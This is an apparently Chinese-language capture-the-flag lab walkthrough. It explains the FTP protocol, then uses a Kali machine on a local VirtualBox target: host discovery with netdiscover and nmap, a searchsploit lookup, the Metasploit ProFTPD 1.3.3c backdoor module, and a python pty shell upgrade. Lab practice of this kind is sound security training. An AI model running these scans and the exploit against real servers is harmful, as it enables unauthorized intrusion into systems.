FTP協議
FTP(File Transfer Protocol,文件傳輸協議) 是 TCP/IP 協議組中的協議之一。FTP協議包括兩個組成部分,其一爲FTP服務器,其二爲FTP客戶端。其中FTP服務器用來存儲文件,用戶可以使用FTP客戶端通過FTP協議訪問位於FTP服務器上的資源。在開發網站的時候,通常利用FTP協議把網頁或程序傳到Web服務器上。此外,由於FTP傳輸效率非常高,在網絡上傳輸大的文件時,一般也採用該協議。
默認情況下FTP協議使用TCP端口中的 20和21這兩個端口,其中20用於傳輸數據,21用於傳輸控制信息。但是,是否使用20作爲傳輸數據的端口與FTP使用的傳輸模式有關,如果採用主動模式,那麼數據傳輸端口就是20;如果採用被動模式,則具體最終使用哪個端口要服務器端和客戶端協商決定。
百度百科
環境準備:
1.靶場導入:使用 Oracle VM VirtualBox
靶場導入完成,啓動靶場,等待攻擊。。。
2. 打開kali攻擊機 攻擊機地址:192.168.31.101
root@kali:~# ifconfig //查看攻擊機IP地址
netdiscover -r 192.168.31.1/24 #查看同一網段內的活動主機,找到靶場IP.
nmap -sV 192.168.31.35#掃描主機服務信息及服務版本
探測到了開放了如下服務:
或
nmap -A -v -T4 192.168.31.35 #掃描主機全部信息
searchsploit ProFTPD 1.3.3c
cat /usr/share/exploitdb/exploits/linux/remote/15662.txt
文本部分代碼
msfconsole
search ProFTPd 1.3.3c
use exploit/unix/ftp/proftpd_133c_backdoor
設置參數
設置成功
id
python -c "import pty;pty.spawn('/bin/bash')" #優化shell